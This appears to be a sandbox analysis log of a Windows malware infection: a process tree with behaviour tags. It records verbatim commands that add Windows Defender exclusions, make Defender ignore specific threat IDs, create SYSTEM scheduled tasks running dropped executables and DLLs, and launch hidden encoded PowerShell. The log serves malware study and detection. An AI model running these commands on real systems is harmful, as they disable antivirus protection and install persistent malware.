C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:323⤵PID:1676
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:643⤵PID:4524
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2604
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2452
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:860
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1448
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:323⤵PID:6140
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:643⤵PID:1384
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:323⤵PID:740
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:643⤵PID:2304
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfNaqWuZy" /SC once /ST 00:31:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:3260 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfNaqWuZy"2⤵PID:5264
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfNaqWuZy"2⤵PID:4356
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 01:16:45 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe\" Wy /BGYZdidXU 757674 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2344 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FPIEUdZLMYPzsiUNM"2⤵PID:1084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 9362⤵
- Program crash
PID:1080
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1252
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1836
-
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exeC:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe Wy /BGYZdidXU 757674 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2984 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"2⤵PID:4212
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:2628
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:1492
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:5612
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1448 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2096 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\rBOWGj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5156 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\xlHRzsY.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:896 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OcPshDNvhDnVmSv"2⤵PID:868
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OcPshDNvhDnVmSv"2⤵PID:5868
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\USRawYq.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3600 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\usrdqkC.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3112 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\uaMQFLy.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5776 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\jPLBMmW.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4212 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 02:06:29 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\dSWxadCE\GpiHvfu.dll\",#1 /cididxj 757674" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1932 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MRTHivZIQsRdEanwm"2⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe" /S YB2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:3184 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵PID:1184
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵PID:5824
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:3936 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:3600
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe\" z0 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1128 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 11083⤵PID:2208
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wDjRE1" /SC once /ST 01:43:25 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5972 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "wDjRE1"2⤵PID:3000
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wDjRE1"2⤵PID:3140
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"2⤵PID:2088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 20642⤵PID:5620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1916 -ip 19161⤵PID:4736
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4116 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd200c3cb8,0x7ffd200c3cc8,0x7ffd200c3cd82⤵PID:5536
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:22⤵PID:3484
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:32⤵PID:5176
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2576 /prefetch:82⤵PID:2304
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:4028
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:12⤵PID:4680
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:12⤵PID:3868
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:12⤵PID:4184
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4160
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5828 -ip 58281⤵PID:3656
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\dSWxadCE\GpiHvfu.dll",#1 /cididxj 7576741⤵PID:4224
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\dSWxadCE\GpiHvfu.dll",#1 /cididxj 7576742⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:5040 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"3⤵PID:1704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 58281⤵PID:6032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5828 -ip 58281⤵PID:1544
-
C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"1⤵PID:1080
-
C:\Users\Admin\AppData\Local\Temp\is-60T68.tmp\setup_34Uv1hLE7B.tmp"C:\Users\Admin\AppData\Local\Temp\is-60T68.tmp\setup_34Uv1hLE7B.tmp" /SL5="$C02A6,6120275,56832,C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5628 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"3⤵PID:1492
-
C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe"C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 1711397ec0a91dd980a7244b5bb3ba843⤵
- Executes dropped EXE
PID:1980 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 1524⤵
- Program crash
PID:2332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1980 -ip 19801⤵PID:6080
-
C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exeC:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe z0 /S1⤵PID:5316
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2888 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1384
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4988
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2348
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4456
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5148
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1140
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5880
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2860
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5568
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:6140
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1552
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5960
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5152
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3108
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1128
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1852
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4736
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4592
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5176
-
